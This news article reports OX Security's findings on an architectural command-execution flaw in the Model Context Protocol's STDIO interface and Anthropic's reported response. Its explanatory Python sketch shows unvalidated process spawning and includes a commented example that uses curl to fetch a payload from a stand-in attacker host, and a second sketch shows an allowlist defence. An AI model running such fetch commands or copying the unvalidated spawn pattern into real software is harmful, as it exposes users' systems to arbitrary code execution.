Anthropic AI protocol flaw exposes thousands of servers to attacks
A critical vulnerability in an artificial intelligence protocol developed by Anthropic could expose more than 200,000 instances and thousands of publicly accessible servers to cyberattacks, according to findings from security firm OX Security. The flaw affects the Model Context Protocol, an open standard designed to connect AI systems with external data sources and tools.
Researchers say the issue allows attackers to execute arbitrary commands on vulnerable systems, potentially exposing sensitive user data, internal databases, API keys, and conversation histories. The scale of exposure spans more than 7,000 internet-facing servers and hundreds of open source projects that rely on the protocol.
Unlike typical software bugs, the vulnerability is rooted in the protocol’s architecture. OX Security found that official software development kits across multiple programming languages inherit the same design flaw. This means developers using the protocol may unknowingly introduce security risks into their systems without clear warnings or safeguards.
The exploit centers on how the protocol handles local process execution through its STDIO interface. Malicious commands can be executed even if the underlying process fails to start properly, with no validation or sanitization checks triggered. Researchers say this behavior creates a silent attack vector that bypasses standard developer tooling alerts.
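The risk class described above can be sketched in a few lines. This is a hypothetical illustration, not the actual MCP SDK code: an integration launching a stdio-based server spawns a local process from configuration it was handed, and if that configuration is attacker-influenced, the command runs with the user's privileges regardless of whether the intended server ever starts.

```python
import subprocess

# Hypothetical sketch of the risk class, NOT the real MCP SDK:
# a client launching a "stdio server" spawns whatever command its
# configuration names, communicating over stdin/stdout.
def launch_stdio_server(command, args):
    # If `command` comes from an untrusted source (e.g. a shared server
    # config), it executes with the user's privileges. Even if the
    # intended server then fails to initialize, the command has already run,
    # and no validation or sanitization step intervenes here.
    return subprocess.Popen(
        [command, *args],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )

# A malicious config could substitute any local binary, for example:
# launch_stdio_server("curl", ["http://attacker.example/payload", "-o", "/tmp/p"])
```

The point of the sketch is that the dangerous step is the spawn itself, which completes before any protocol-level handshake could fail.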
Anthropic has characterized the behavior as expected and has declined to modify the protocol at its core. The company maintains that the execution model is secure by default and that input sanitization should be handled by developers. This stance has drawn criticism from cybersecurity experts, who argue that leaving such protections to individual developers increases systemic risk.
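A minimal sketch of the kind of developer-side safeguard this stance implies: validate a server command against an explicit allowlist before ever spawning it. The command names and function below are illustrative assumptions, not part of any official SDK.

```python
import shutil

# Illustrative allowlist; a real integration would scope this to the
# exact interpreters/launchers it actually ships with.
ALLOWED_COMMANDS = {"node", "python3", "uvx"}

def validate_server_command(command: str) -> str:
    """Reject any server command not explicitly allowlisted,
    and resolve it to an absolute path before it is spawned."""
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"server command not allowlisted: {command!r}")
    resolved = shutil.which(command)
    if resolved is None:
        raise FileNotFoundError(f"allowlisted command not found: {command}")
    return resolved
```

Critics' concern is precisely that every integrator must remember to write and maintain a check like this, rather than the protocol enforcing it once.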
The findings add to broader concerns around the security of AI infrastructure. OX Security reports that it has identified multiple high-severity vulnerabilities in projects built on the protocol and says it has made numerous responsible disclosures. Previous research by other firms has also highlighted potential remote code execution paths linked to similar integrations.
Experts warn that relying on developers to secure foundational components could lead to widespread exposure, given inconsistent security practices across the ecosystem. The case highlights growing tensions between rapid AI innovation and the need for robust security standards.